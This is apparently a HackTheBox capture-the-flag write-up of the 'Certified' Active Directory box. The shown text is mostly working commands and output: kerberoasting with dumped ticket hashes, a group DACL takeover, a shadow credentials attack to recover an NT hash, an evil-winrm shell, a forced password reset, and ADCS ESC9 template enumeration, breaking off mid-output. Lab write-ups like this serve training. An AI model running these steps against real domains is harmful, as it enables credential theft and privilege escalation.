WriteupsHTB — Certified
ADMediumWindows
HTB — Certified
Shadow Credentials attack via WriteProperty on user object. ADCS ESC9 certificate template abuse to impersonate a privileged account.
January 9, 2025HackTheBox
#AD#ADCS#Shadow Credentials#ESC9
As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
nmap
sh
nmap -sC -sV -Pn -p- --open 10.10.11.41
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-09 11:25 EST
Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 65.00% done; ETC: 11:28 (0:00:21 remaining)
Nmap scan report for 10.10.11.41
Host is up (0.022s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-09 23:27:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-01-09T23:29:19+00:00; +7h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-01-09T23:29:18+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-09T23:29:19+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-09T23:29:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-09T23:28:40
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.59 seconds
sh
nxc smb 10.10.11.41 -u judith.mader -p 'judith09'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09 445/tcp open microsoft-ds?
sh
445/tcp open microsoft-ds?sh
nxc smb 10.10.11.41 -u judith.mader -p 'judith09' --shares 2 ↵
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [*] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share bloodhound
sh
sudo bloodhound-python -u 'judith.mader' -p 'judith09' -ns 10.10.11.41 -d certified.htb -c all
zip -r certified.htb.zip *.jsonShortest Paths to Unconstrained Delegation Systems
Kerberoastable
usernames
- usernames
sh
nxc smb 10.10.11.41 -u judith.mader -p 'judith09' --users 2 ↵
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.41 445 DC01 Administrator 2024-05-13 14:53:16 0 Built-in account for administering the computer/domain
SMB 10.10.11.41 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.41 445 DC01 krbtgt 2024-05-13 15:02:51 0 Key Distribution Center Service Account
SMB 10.10.11.41 445 DC01 judith.mader 2024-05-14 19:22:11 0
SMB 10.10.11.41 445 DC01 management_svc 2024-05-13 15:30:51 0
SMB 10.10.11.41 445 DC01 ca_operator 2024-05-13 15:32:03 0
SMB 10.10.11.41 445 DC01 alexander.huges 2024-05-14 16:39:08 0
SMB 10.10.11.41 445 DC01 harry.wilson 2024-05-14 16:39:37 0
SMB 10.10.11.41 445 DC01 gregory.cameron 2024-05-14 16:40:05 0 kerberoasting
sh
GetUserSPNs.py -dc-ip 10.10.11.41 certified.htb/judith.mader
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 <never> sh
sudo ntpdate 10.10.11.41 & GetUserSPNs.py -dc-ip 10.10.11.41 certified.htb/judith.mader -request-user management_svc
[1] 140392
2025-01-09 20:40:14.899080 (-0500) +25201.394745 +/- 0.008736 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.394745
[1] + 140392 done sudo ntpdate 10.10.11.41
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$01daec3f...$6cdb0b69b87daf5f5070b90e77ad4921628e8b55ae062184ab1d67464d0012599a51873d1f14343e93a33be1ca66c9400cd101ca22e4ea1abf5162faaae7f62d52aa6bf7564fef30d0851c4dd07ad7e7866b058b0dfa33b09414664ac1ffbf1cc14c7c8caa2c578b4edcfa27ebd200c76b271e6471f9b17ab130394ba37aba1adf21afe6fefcaacb7f01f299ae11264bec7cb3ab8e9a3fb804706c94b5fa459f5ff0005877e1248f30421feb10c57f9c75582da713e9a8abc329e221969368ff2a75ec3483dbbf5bb27d6a10768b12c489bf7d9a1acae6d58c6f504cd200bc3f10f04dc6c8fa0708086486de00b686b70c9ffe8443af2705bda9f596fb6f3f3225d83132c0d12dfd5ea837030b34e52b93b57fbc5dab4edd90f6f8ced1b6e3446d5c4d942dbf65e0c3cddaf304bba68421f5612cb4632386ed46c55dfdba399476840babeede5e682df0835b4b35d6da089d4f9ef7ab4d186a6ecd647306d19bff5bb872cb524ccf02f5dd467a43b622592ae130498104671d13b934d086e5abbbf8d7aa16644dc26d4669fb570d862936e43083002254ccb36b73bd9829fbc7080f31245068cda42734ae7d299ff5e8d1ec96482709c1135a8e1a889522514c63f0a2d494aec888e0497910d1b56d247b150e1be9ee4c621d8b79a8a69c978a86e1a5298eb220122bd9e910c66c6e28d3d865e605823f881c6b41c3a5362733c78063c351ce9c6f61c991183518b46520f4212f46f239676a467d2c8cce9a6953abd681d931b708f25ffcd30351dbc6463fb266b0a85b94bc8965405f0505ed2c31445c3bb03a7ea5983222bbdc54dc620a2e9b18ae91f9ac6998107702770468dae2e01260958d714c2ec092968cd7f812516a9b3160bdb5b879ec159dc32716ae980c385662d335caa5daa1ca48a88a3a7ab664d6a1bc49f3c1a9f186b87bf3cb61042afb560efef55006a126a73a474cfe31e2a4c414b8173cf6d62aaf1db732ae5997e11d9cdd8aa15334ec3e1ed17832d51482fb74f1d809b660e3f73f5b3a38e34a9bd9241737893be26e951f124ecae0d0568772d9cc4691a17f37f32d3ea027578c1c1b0a5158d48791e1fbe949b686a83c532b376860738d9db5e445b6a621f194fb942223d7ca0b07fadefd40f929939653cb15dc387688719e60f12f4a611d5dcafa23e21004f36b97d9575e1c49b141b42e9136961e6f5a57a110e88d543270b795893d10c8114b470faf6a077ac0708f23a2270d8454116d9f01981328485630218b2af62a4e2388ca3c0bda94876c16370f9c1ec8bb151f7585ec06c7f05629e7231154a67bdab5497ee04c5b296d1e23ca82ef29aeb1c7e19ea75c7349b4342b8733ea82133e4b9b7555a36f751e8a1ef89a5b34befeeb59cfd54391323f5d6599e949ddd77758e34abfde2ab23cf017321d07af8aa70f4e26c3d1753a5dfc64c69f027da46b66ec6e3b1673613dd94d8f2a4759a8d85c1575264779603708c929690422324035cc8a6a1a82ea614435b0f0b461fc239592b1c5846fb9ccc228e5806ebfc5d5921a095a18c047c0247bc000WriteOwner
sh
owneredit.py -action write -new-owner 'judith.mader' -target 'Management' CERTIFIED/judith.mader:judith09 -dc-ip 10.10.11.41
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!sh
ldapdomaindump -u 'CERTIFIED\judith.mader' -p 'judith09' -d certified.htb -dc-ip 10.10.11.41sh
grep -i 'Management' domain_groups.json
"Management"
"CN=Management,CN=Users,DC=certified,DC=htb"
"CN=management service,CN=Users,DC=certified,DC=htb"
"Management"
"Management"
"dn": "CN=Management,CN=Users,DC=certified,DC=htb"
"CN=Management,CN=Users,DC=certified,DC=htb"
"Remote Management Users"
"Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user."
"CN=Remote Management Users,CN=Builtin,DC=certified,DC=htb"
"CN=management service,CN=Users,DC=certified,DC=htb"
"Remote Management Users"
"Remote Management Users"
"dn": "CN=Remote Management Users,CN=Builtin,DC=certified,DC=htb"
"RDS Management Servers"
"Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group."
"CN=RDS Management Servers,CN=Builtin,DC=certified,DC=htb"
"RDS Management Servers"
"RDS Management Servers"
"dn": "CN=RDS Management Servers,CN=Builtin,DC=certified,DC=htb"- the
-target-dnis the one distinguished name in that format so using the above command cna find theDN
sh
dacledit.py -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=Management,CN=Users,DC=certified,DC=htb' CERTIFIED/judith.mader:judith09 -dc-ip 10.10.11.41
[*] DACL backed up to dacledit-20250109-141350.bak
[*] DACL modified successfully!rerun if didnt work
sh
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"verify judith.mader is part of the Management group
sh
net rpc group members "Management" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41" 130 ↵
CERTIFIED\judith.mader
CERTIFIED\management_svc- cannot crack the tgs
sh
sudo ntpdate 10.10.11.41 & python3 targetedKerberoast.py -v -d 'certified.htb' -u 'judith.mader' -p 'judith09'
[1] 294591
2025-01-09 22:34:50.476500 (-0500) +25201.597600 +/- 0.009927 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.597600
[1] + 294591 done sudo ntpdate 10.10.11.41
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (management_svc)
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$3026b11a...$458717564119b2c82fc7c18694e089bf837bb36c42757b220974b3f2a4e4197afc02bd46ea4888f1e146ee88bae6c69fa356a193d85bea946962ee4847c1c5332f9ea1158f9ed73fd105770e56b8823096b58cf2cc87245d992c07efefd580d9940941cfc93063ea59705a9f381117086b8ab9be0767f11daebc840e788692aeb9b77bc379770dcb9d71cfe91e7c36fbd0d1c1c338befd4827d88ab209119253c0d64ef84ee25e3010299547686c547122c4863376d8fe13b64067dd7e5c0626e5faafe2ecefcdab594396cd11f6c8146a28c31e5c141ba24033cd6104c04767f181c69901a1e7bd87e956409cfc1e3dc30b9e81cda37136d4902b7b43df2ec86b060f46be33af101442a416273d102a296a5c90b14c94afafcc9b7bc1d8c4871da33318eb7bbf25ea94e25e5dfd684c5e8d77fc0a00b604b905348523b1e78d8fe85fdb8c602fa8dcdfdcd1fd1d4fad4ae2ab1ef6042634917370a4f0edc9f05d4b3461c758baaa859ee1868c510374c8245f1edc4eb9676952b5f1adb1d8d91f0e4719e75321b4834f2d0a149446e4c283316b402bc55c4c7c3f62e12f28d5a72c5b14c183fdc6f194df36a44ecb380f1cea6ee3577cec0f8f29a5f1e7df9bb9756d41cc40f923807afd6b2d1ca13f7d8a2fa3d2ee1507096a4daae3bb006f8837ce4f7f70655a419a38256df0dd3aac326280e5d87933a4fc947cef7f548d81d5abe8247ac1ba850b1e8b6fbdaf7347233fa092f832deaf9a8d4b98cdf47f94586d7f354cdddfd47b93cc2b106ddbc8ec71889681933510eef7fc5717328062278adf834c8c63d8e1f82e3823e1c73a06c77e58ef67729797f8b35613843bc1c04f316229c28104b2924221e357743ca4e48fdd4ba0fd19cbd6b6ccd93ac7ea606a27a03d07426795c3a38e7789167484d13f18589eedbc57ee71b0967a78c1916f4fb5696e3ff040d670495a4646979123e01b1a7b4e3c7aa0f8e85eb0ea3947749bf141c47ae2b0abd21a52a1a8c6770fb1172f5cd6903f0438c41937f4f16d68a55e926f6b12b82084e4d0adfbda2bbac77e0cb9281c06ac195903ddc5b84bd63b360ed84fcec777c6f881b487eb840a2c933a1940c19c544a09e280392520c00d2812784e96100faf589f7e7d3c093829d1bb74270bdcb2e366d5456609730e8064db1a8c1f0786e4a7cc389c367ac6995f63b7f012fb8930aab19c626e4db385e47407aaecdefe4bffd509a67c8176150580f9365386e15923edbca386978c99f4c21ff9f92f56d372d1b97041864af7a0fa9584a1eb3ae4eeea0cebe04a22802734ba2df565fe348a15efec09b6b1bfd28d136bad005c5365315ff120f4e2ad7ab9e3b5bce4ffdf1cbee03406becb21ffc5db0f93768a80012b89edc1b04eb9cf5f3c46e382f690bacf316a47c1a2e806c852727502f9ec39ab7a5a6bf78095050fa370e4c53676fc16c659843fd08f36c18c687ce5a3e489414eaaa7fada0ca8f490fe1c5bcb30da75bd4174740d523b0d68abb430051f5015d7e52b8676b0f2902c06ca7a8bba68674b1235e1d65a8b9b35c69208f414a6eeee831c62shadow credential attack
- this way to get
management_svchash and authenticate
sh
pywhisker -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a0cef891-c19c-5000-41cd-cdafd876937f
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: hWjeEN6s.pfx
[*] Must be used with password: f3yKhrBp0l19SgXu6mnk
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtoolssh
git clone https://github.com/dirkjanm/PKINITtools.gitsh
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/gettgtpkinit.py -d certified.htb -cert-pfx hWjeEN6s.pfx -pfx-pass f3yKhrBp0l19SgXu6mnk certified.htb/management_svc management.ccache
[1] 38277
2025-01-09 23:33:05.017063 (-0500) +25202.155711 +/- 0.010562 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25202.155711
[1] + done sudo ntpdate 10.10.11.41
2025-01-09 23:33:05,088 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-09 23:33:05,103 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-09 16:33:18,921 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-09 16:33:18,921 minikerberos INFO aeeca941bbb824881d0d5b5374eaa337517dab34dd597f567a77f3a15d70fd63
INFO:minikerberos:aeeca941bbb824881d0d5b5374eaa337517dab34dd597f567a77f3a15d70fd63
2025-01-09 16:33:18,924 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to filesh
export KRB5CCNAME=/home/sake/htb-labs/Certified/management.ccachesh
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/gettgtpkinit.py -d certified.htb -cert-pfx jszsD8ch.pfx -pfx-pass HrRxb2qXNYt9b2ss1BdL certified.htb/management_svc management.ccache
[1] 65867
2025-01-09 23:41:39.479407 (-0500) +25201.715631 +/- 0.008481 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.715631
[1] + done sudo ntpdate 10.10.11.41
2025-01-09 23:41:39,579 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-09 23:41:39,591 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-09 23:41:43,808 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-09 23:41:43,808 minikerberos INFO 830721beaa1e574b2fcdc57050e6e59e7d1f3ad6bd1d6085330ac8d708dea916
INFO:minikerberos:830721beaa1e574b2fcdc57050e6e59e7d1f3ad6bd1d6085330ac8d708dea916
2025-01-09 23:41:43,810 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
sh
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/getnthash.py -key 830721beaa1e574b2fcdc57050e6e59e7d1f3ad6bd1d6085330ac8d708dea916 certified.htb/management_svc
[1] 68266
2025-01-09 23:43:43.523778 (-0500) +25201.722728 +/- 0.010143 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.722728
[1] + done sudo ntpdate 10.10.11.41
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c183...sh
nxc smb 10.10.11.41 -u management_svc -H 'a091c183...'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\management_svc:a091c183... sh
evil-winrm -i 10.10.11.41 -u management_svc -H 'a091c183...'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> whoami
certified\management_svcuser.txt
sh
*Evil-WinRM* PS C:\Users\management_svc\Desktop> cat user.txt
4160f374...priv esc
sh
*Evil-WinRM* PS C:\Users> net user management_svc
User name management_svc
Full Name management service
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/13/2024 7:30:51 AM
Password expires Never
Password changeable 5/14/2024 7:30:51 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/9/2025 8:41:43 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Management *Domain Users
The command completed successfully.GenericAll to CA_OPERATOR
Force Change Password
sh
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('certified.htb\management_svc', $SecPassword)sh
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Forcesh
*Evil-WinRM* PS C:\Users\management_svc> upload /opt/windows/PowerView.ps1
*Evil-WinRM* PS C:\Users\management_svc> Import-Module .\PowerView.ps1sh
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity CA_OPERATOR -AccountPassword $UserPasswordsh
nxc smb 10.10.11.41 -u CA_OPERATOR -p 'Password123!'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\CA_OPERATOR:Password123! enumerate certificates
- authenticate as
CA_OPERATOR
sh
*Evil-WinRM* PS C:\Users\management_svc> net user CA_OPERATOR Password123! /domainsh
*Evil-WinRM* PS C:\Users\management_svc> upload /opt/windows/Certify.exesh
*Evil-WinRM* PS C:\Users\management_svc> .\Certify.exe find /ca:"certified-DC01-CA"
CA Name : DC01.certified.htb\certified-DC01-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
Object Control Permissions
Owner : CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteOwner Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteDacl Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteProperty Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
CA Name : DC01.certified.htb\certified-DC01-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
Object Control Permissions
Owner : CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteOwner Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteDacl Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteProperty Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
sh
certipy find -u 'CA_OPERATOR@certified.htb' -p 'Password123!' -dc-ip 10.10.11.41 -vulnerable -enable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20250109221632_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250109221632_Certipy.txt'
[*] Saved JSON output to '20250109221632_Certipy.json'sh
cat 20250109221632_Certipy.txt
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D
Certificate Validity Start : 2024-05-13 15:33:41+00:00
Certificate Validity End : 2124-05-13 15:43:41+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CERTIFIED.HTB\Administrators
Access Rights
ManageCertificates : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
ManageCa : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Enroll : CERTIFIED.HTB\Authenticated Users
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectAltRequireUpn
Enrollment Flag : NoSecurityExtension
AutoEnrollment
PublishToDs
Private Key Flag : 16777216
65536
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED.HTB\operator ca
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFIED.HTB\Administrator
Write Owner Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
Write Dacl Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
Write Property Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
[!] Vulnerabilities
ESC9 : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extensionsh
cat 20250109221632_Certipy.json
{
"Certificate Authorities": {
"0": {
"CA Name": "certified-DC01-CA",
"DNS Name": "DC01.certified.htb",
"Certificate Subject": "CN=certified-DC01-CA, DC=certified, DC=htb",
"Certificate Serial Number": "36472F2C180FBB9B4983AD4D60CD5A9D",
"Certificate Validity Start": "2024-05-13 15:33:41+00:00",
"Certificate Validity End": "2124-05-13 15:43:41+00:00",
"Web Enrollment": "Disabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "CERTIFIED.HTB\\Administrators",
"Access Rights": {
"2": [
"CERTIFIED.HTB\\Administrators",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
],
"1": [
"CERTIFIED.HTB\\Administrators",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
],
"512": [
"CERTIFIED.HTB\\Authenticated Users"
]
}
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "CertifiedAuthentication",
"Display Name": "Certified Authentication",
"Certificate Authorities": [
"certified-DC01-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"NoSecurityExtension",
"AutoEnrollment",
"PublishToDs"
],
"Private Key Flag": [
"16777216",
"65536"
],
"Extended Key Usage": [
"Server Authentication",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1000 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CERTIFIED.HTB\\operator ca",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CERTIFIED.HTB\\Administrator",
"Write Owner Principals": [
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
],
"Write Dacl Principals": [
"CERTIFIED.HTB\\Domain Admins",
